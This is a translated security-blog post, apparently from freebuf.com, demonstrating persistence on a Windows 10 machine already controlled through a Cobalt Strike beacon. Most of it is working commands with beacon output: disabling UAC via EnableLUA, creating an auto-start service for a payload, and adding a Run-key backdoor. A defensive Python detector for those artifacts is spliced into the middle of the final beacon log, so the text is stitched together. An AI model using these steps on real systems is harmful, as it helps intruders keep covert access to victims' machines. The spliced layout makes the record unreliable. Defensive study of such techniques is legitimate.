Environment setup
Windows 10 virtual machine
Cobalt Strike [the client is deployed on Windows 10 here; the team server is hosted in the cloud]
Procedure
The Windows 10 VM has already been compromised by a remote trojan and is controlled through Cobalt Strike
Enter the Beacon console in Cobalt Strike
Explanation [leaving a persistent backdoor via an executable]
Change the value of HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA to 0
Setting this value to 0 disables UAC, so that operations on the machine really do run with full administrator rights
Query the registry:
shell reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"
EnableLUA set to 1
EnableLUA set to 0
beacon> shell sc create "test" binpath= "C:\Users\calmness\Desktop\ceshi.exe" [substitute the path to your own payload]
[*] Tasked beacon to run: sc create "test" binpath= "C:\Users\calmness\Desktop\ceshi.exe"
[+] host called home, sent: 94 bytes
[+] received output:
[SC] CreateService 成功
beacon> shell sc description "test" "测试" [set the service description]
[*] Tasked beacon to run: sc description "test" "测试"
[+] host called home, sent: 59 bytes
[+] received output:
[SC] ChangeServiceConfig2 成功
beacon> shell sc config "test" start= auto [set the service to start automatically]
[*] Tasked beacon to run: sc config "test" start= auto
[+] host called home, sent: 59 bytes
[+] received output:
[SC] ChangeServiceConfig 成功
beacon> shell net start "test" [start the service]
[*] Tasked beacon to run: net start "test"
[+] host called home, sent: 47 bytes
[+] received output:
Result: the beacon checks in!!!
Alternatively
Insert it directly into the registry so it becomes an autostart entry
Next: add the generated backdoor
shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "calm" /t REG_SZ /d "C:\Users\calmness\calmnexx.exe" /f
Reboot
It still checks in after the reboot
One more note:
beacon> shell cmd /k dir
[*] Tasked beacon to run: cmd /k dir
[+] host called home, sent: 41 bytes
[+] received output:
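The two registry changes above (EnableLUA set to 0, and a Run value pointing at an executable under the user's profile) are exactly the artifacts a defender looks for when hunting this kind of persistence. The following Python is an added example, not part of the original post: it parses `reg query` output for the two keys the post modifies and flags both indicators. The sample output is constructed to mirror the real tool's layout; the OneDrive entry and the user-writable prefix list are assumptions for illustration.

```python
import re

# Constructed sample of `reg query` output (same layout as the real tool prints)
# for the two keys the post modifies; not captured from a real host.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x0

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background
    calm    REG_SZ    C:\Users\calmness\calmnexx.exe
"""

# Locations an unprivileged user can write to (assumed list). An autostart entry
# whose binary lives here, like the Run value and service binpath in the post,
# is a common persistence indicator; installed software sits under Program Files.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

# One value line of `reg query` output: <indent><name> <REG_TYPE> <data>
VALUE_RE = re.compile(r"^\s{2,}(\S+)\s+(REG_\w+)\s+(.*)$")

def parse_reg_query(text):
    """Return {key_path: {value_name: (reg_type, data)}} from `reg query` output."""
    keys, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.strip()
            keys[current] = {}
        elif current and (m := VALUE_RE.match(line)):
            keys[current][m.group(1)] = (m.group(2), m.group(3).strip())
    return keys

def image_path(data):
    """Strip quotes and arguments from a Run value, leaving only the executable path."""
    if data.startswith('"'):
        return data[1:data.find('"', 1)]
    return data.split(" ")[0]

def find_persistence_indicators(text):
    """Flag EnableLUA=0 and Run entries whose binary sits in a user-writable path."""
    findings = []
    for key, values in parse_reg_query(text).items():
        if key.lower().endswith(r"\policies\system"):
            reg_type, data = values.get("EnableLUA", ("", ""))
            if reg_type == "REG_DWORD" and int(data, 16) == 0:
                findings.append(("UAC_DISABLED", key, "EnableLUA", data))
        elif key.lower().endswith(r"\currentversion\run"):
            for name, (_, data) in values.items():
                if image_path(data).lower().startswith(USER_WRITABLE_PREFIXES):
                    findings.append(("RUN_KEY_USER_PATH", key, name, image_path(data)))
    return findings
```

Running `find_persistence_indicators(SAMPLE_REG_OUTPUT)` returns one UAC_DISABLED finding and one RUN_KEY_USER_PATH finding for the `calm` value, while the Program Files entry passes.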
驱动器 C 中的卷没有标签
卷的序列号是 88B7-95BE
C:\Users\calmness\Desktop 的目录
2020/09/21 13:07 <DIR> .
Done!!!
Source: freebuf.com 2020-09-28 19:20:37 by: calmness